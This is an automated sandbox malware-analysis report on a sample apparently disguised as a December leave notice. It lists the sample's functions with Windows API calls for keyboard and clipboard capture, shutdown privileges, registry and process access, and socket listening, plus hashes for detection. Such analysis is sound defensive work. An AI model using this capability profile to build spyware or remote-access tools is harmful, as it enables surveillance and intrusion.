                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 1824444939-438819550
                                                      • Opcode ID: 99441f8846f468e714643c068fa81e92ea6319675df0c9cd91fb67f9eb4459df
                                                      • Instruction ID: 8835f0bec5e3bb3d80e99a097d448735f239b131b809377ee8276ca58f73eda5
                                                      • Opcode Fuzzy Hash: 99441f8846f468e714643c068fa81e92ea6319675df0c9cd91fb67f9eb4459df
                                                      • Instruction Fuzzy Hash: 2B31D23290061ABACF21ABE0DC49ADE77AEBF45330F180566E841E6281DB35DA45DB64
                                                      Function 00F87D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset
                                                      • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                      • API String ID: 2102423945-2023335898
                                                      • Opcode ID: 8b09b72238c45fc224d8581de07f5806ebf7fcd2ad2f4726d3221ac81021242a
                                                      • Instruction ID: 564bc425b0917a0a99c793b880b6cff9c4814820d1e1d7529a409033adff1792
                                                      • Opcode Fuzzy Hash: 8b09b72238c45fc224d8581de07f5806ebf7fcd2ad2f4726d3221ac81021242a
                                                      • Instruction Fuzzy Hash: 8D82C272D04219CBCB24DF98C8807FDBBB1BF44320F2481A9D959AB391E7749D85EB80
                                                      Function 00FD091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00FD09DF
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FD09EF
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FD09FB
                                                      • __wsplitpath.LIBCMT ref: 00FD0A59
                                                      • _wcscat.LIBCMT ref: 00FD0A71
                                                      • _wcscat.LIBCMT ref: 00FD0A83
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD0A98
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0AAC
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0ADE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0AFF
                                                      • _wcscpy.LIBCMT ref: 00FD0B0B
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FD0B4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                      • String ID: *.*
                                                      • API String ID: 3566783562-438819550
                                                      • Opcode ID: d949d7bb8e12d65b1c5dd2ab178f46df5df9cf764f8eca981fd6021a5d7aa9e3
                                                      • Instruction ID: d675629e036af21acb666afbcd11a6bd547e6cd95aa5f4fc2ecf69d1852a0f9b
                                                      • Opcode Fuzzy Hash: d949d7bb8e12d65b1c5dd2ab178f46df5df9cf764f8eca981fd6021a5d7aa9e3
                                                      • Instruction Fuzzy Hash: 326158725083059FD710EF60C845AAEB3E9BF89324F08891AE999C7341DB39E945DB92
                                                      Function 00FBA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FBABD7
                                                        • Part of subcall function 00FBABBB: GetLastError.KERNEL32(?,00FBA69F,?,?,?), ref: 00FBABE1
                                                        • Part of subcall function 00FBABBB: GetProcessHeap.KERNEL32(00000008,?,?,00FBA69F,?,?,?), ref: 00FBABF0
                                                        • Part of subcall function 00FBABBB: HeapAlloc.KERNEL32(00000000,?,00FBA69F,?,?,?), ref: 00FBABF7
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FBAC0E
                                                        • Part of subcall function 00FBAC56: GetProcessHeap.KERNEL32(00000008,00FBA6B5,00000000,00000000,?,00FBA6B5,?), ref: 00FBAC62
                                                        • Part of subcall function 00FBAC56: HeapAlloc.KERNEL32(00000000,?,00FBA6B5,?), ref: 00FBAC69
                                                        • Part of subcall function 00FBAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FBA6B5,?), ref: 00FBAC7A
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FBA6D0
                                                      • _memset.LIBCMT ref: 00FBA6E5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FBA704
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA715
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FBA752
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FBA76E
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA78B
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FBA79A
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FBA7A1
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FBA7C2
                                                      • CopySid.ADVAPI32(00000000), ref: 00FBA7C9
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FBA7FA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FBA820
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FBA834
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: 48831a07968a1513f78fb6869d44edbb26625dfcf71b12597d3af92c93f75bb2
                                                      • Instruction ID: feb666d7b6a516c88821bb4f32c22f8d9aeb055afbaab953033b09654f3bea1a
                                                      • Opcode Fuzzy Hash: 48831a07968a1513f78fb6869d44edbb26625dfcf71b12597d3af92c93f75bb2
                                                      • Instruction Fuzzy Hash: 5B514871900209BBDF11DFA6DC44AEEBBB9FF04310F148129F915AA280DB39DA06DF61
                                                      Function 00F86F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                      • API String ID: 0-4052911093
                                                      • Opcode ID: 0c74db43d1e4d729fbae362005f5bee0ff0479b78426def9a5f9424880d1e037
                                                      • Instruction ID: e771cc99c16178c219a80a4c70a5a1ff09b5352c4f9cc464e3093741aebc1cf9
                                                      • Opcode Fuzzy Hash: 0c74db43d1e4d729fbae362005f5bee0ff0479b78426def9a5f9424880d1e037
                                                      • Instruction Fuzzy Hash: 2D728171E04319DBEF25EF58C8407EEB7B5BF48310F2441AAE955EB281DB349A81DB90
                                                      Function 00FC63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FC6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FC5FA6,?), ref: 00FC6ED8
                                                        • Part of subcall function 00FC72CB: GetFileAttributesW.KERNEL32(?,00FC6019), ref: 00FC72CC
                                                      • _wcscat.LIBCMT ref: 00FC6441
                                                      • __wsplitpath.LIBCMT ref: 00FC645F
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FC6474
                                                      • _wcscpy.LIBCMT ref: 00FC64A3
                                                      • _wcscat.LIBCMT ref: 00FC64B8
                                                      • _wcscat.LIBCMT ref: 00FC64CA
                                                      • DeleteFileW.KERNEL32(?), ref: 00FC64DA
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FC64EB
                                                      • FindClose.KERNEL32(00000000), ref: 00FC6506
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                      • String ID: \*.*
                                                      • API String ID: 2643075503-1173974218
                                                      • Opcode ID: e32f54697426871f58623f0f1338e1669b3ed1f6f315ee547859a7cfd4eab36b
                                                      • Instruction ID: 7791143148fb0c016a8c2c529078700cbc68b42f956e47747e19487d5867347b
                                                      • Opcode Fuzzy Hash: e32f54697426871f58623f0f1338e1669b3ed1f6f315ee547859a7cfd4eab36b
                                                      • Instruction Fuzzy Hash: 493191B240C385AAC321EBE48985EDBB7DCAB56310F04492EF5D9C3141EA3AD50D9777
                                                      Function 00FE31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE328E
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FE332D
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00FE33C5
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00FE3604
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE3611
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: f92caab23db1656ef180924f9d2fd5aaf69f620cda99563b50593ef776810cc1
                                                      • Instruction ID: d76b21068ab6b0d573146b769e8260466f8e93fbad563c5614c347138caa8334
                                                      • Opcode Fuzzy Hash: f92caab23db1656ef180924f9d2fd5aaf69f620cda99563b50593ef776810cc1
                                                      • Instruction Fuzzy Hash: 98E16E31604201AFCB15DF69CD99E6ABBE8EF88720F04886DF44AD72A1CB35ED05DB51
                                                      Function 00FC2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00FC2B5F
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00FC2BE0
                                                      • GetKeyState.USER32(000000A0), ref: 00FC2BFB
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00FC2C15
                                                      • GetKeyState.USER32(000000A1), ref: 00FC2C2A
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00FC2C42
                                                      • GetKeyState.USER32(00000011), ref: 00FC2C54
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00FC2C6C
                                                      • GetKeyState.USER32(00000012), ref: 00FC2C7E
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00FC2C96
                                                      • GetKeyState.USER32(0000005B), ref: 00FC2CA8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 857bfc7265b02df1e44cccfadff65e4d4b2b96ae3a3ab6f7962d7666ea556841
                                                      • Instruction ID: b71c0fba0613a7ec18fb1b1855a94a90d49c4c1016bd0bbbbc50320583cec61a
                                                      • Opcode Fuzzy Hash: 857bfc7265b02df1e44cccfadff65e4d4b2b96ae3a3ab6f7962d7666ea556841
                                                      • Instruction Fuzzy Hash: E141E830D047CB6DFFB5DBA08606BA9BEA0EB11334F04404DD9C6562C1DBA99DC8E762
                                                      Function 00FD6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 0deef5749ce7b52d02358bb0b1c0bbc19a11d4f71f8a7f3ce1dfc86d3333c705
                                                      • Instruction ID: 013c60663ca684a972d189ca0cd6aac23cf3b7b99246245224b8ab166bc53bfe
                                                      • Opcode Fuzzy Hash: 0deef5749ce7b52d02358bb0b1c0bbc19a11d4f71f8a7f3ce1dfc86d3333c705
                                                      • Instruction Fuzzy Hash: 4F21A631700110AFDB21AF94ED49B2D77AAEF08720F04841AF98AD7351CB79EC009B61
                                                      Function 00FDC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FB9ABF: CLSIDFromProgID.OLE32 ref: 00FB9ADC
                                                        • Part of subcall function 00FB9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00FB9AF7
                                                        • Part of subcall function 00FB9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00FB9B05
                                                        • Part of subcall function 00FB9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00FB9B15
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00FDC235
                                                      • _memset.LIBCMT ref: 00FDC242
                                                      • _memset.LIBCMT ref: 00FDC360
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00FDC38C
                                                      • CoTaskMemFree.OLE32(?), ref: 00FDC397
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 00FDC3E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: 834fe5255ba11066ccb71c269cfa12dac8b6cc1a5f99293a22203358520c9e9a
                                                      • Instruction ID: c22857d13b248e2abab2ac1ab809e57f9cc1c36c9b7dac1426eaacb82270078a
                                                      • Opcode Fuzzy Hash: 834fe5255ba11066ccb71c269cfa12dac8b6cc1a5f99293a22203358520c9e9a
                                                      • Instruction Fuzzy Hash: 78915B71D00219ABDB10DFE4DC81EDEBBB9EF08710F14811AF519A7281DB749A45EFA0
                                                      Function 00FC79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FBB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FBB180
                                                        • Part of subcall function 00FBB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FBB1AD
                                                        • Part of subcall function 00FBB134: GetLastError.KERNEL32 ref: 00FBB1BA
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00FC7A0F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: 6f2060f4f5a92446fe19bc18fce5590cec89b4ab307552a37c5575e8f536017e
                                                      • Instruction ID: a78dfab85d1e4dcb7ee5d3b4a3ed5d6ca90fc9d80e7ad949d48874b0c5cc7f54
                                                      • Opcode Fuzzy Hash: 6f2060f4f5a92446fe19bc18fce5590cec89b4ab307552a37c5575e8f536017e
                                                      • Instruction Fuzzy Hash: B101FC71A583136AF72C76B5DD4BFBF32589700750F14041CBD43A20E1D56D9E00AAB0
                                                      Function 00FD8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FD8CA8
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8CB7
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00FD8CD3
                                                      • listen.WSOCK32(00000000,00000005), ref: 00FD8CE2
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8CFC
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00FD8D10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 0cdbef60bfea8daebd68021019b9360134b938e63ef41c62d0dc7aaf48947066
                                                      • Instruction ID: fdde9e5c6fb666dc98b07eca6d4b9a950a01d4470c3c94a312400a7c1ab25b27
                                                      • Opcode Fuzzy Hash: 0cdbef60bfea8daebd68021019b9360134b938e63ef41c62d0dc7aaf48947066
                                                      • Instruction Fuzzy Hash: 1F21E431600201AFCB21EFA4CD45B6E77AAFF48360F144159F95AA73C1CB74AD02EB61
                                                      Function 00FC6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FC6554
                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FC6564
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00FC6583
                                                      • __wsplitpath.LIBCMT ref: 00FC65A7
                                                      • _wcscat.LIBCMT ref: 00FC65BA
                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00FC65F9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                      • String ID:
                                                      • API String ID: 1605983538-0
                                                      • Opcode ID: b3e28c760942b1927e7de70255db413966f08cde35d78eda54ad3773ac70867b
                                                      • Instruction ID: c6f71992fa78939b46a56f02db328af2adb3ea2fc26f951b6c9129179dc69f2e
                                                      • Opcode Fuzzy Hash: b3e28c760942b1927e7de70255db413966f08cde35d78eda54ad3773ac70867b
                                                      • Instruction Fuzzy Hash: 6D21D7B1D04219ABDB21ABA0CD89FDDB7BCAB09310F1004A9F544E3141DB759F84DB60
                                                      Function 00FD923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FDA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FDA84E
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00FD9296
                                                      • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00FD92B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 4170576061-0
                                                      • Opcode ID: 8c048803279c635c91507cec3eed2bea77d925e6be1d52b3f05f13d563c40e39
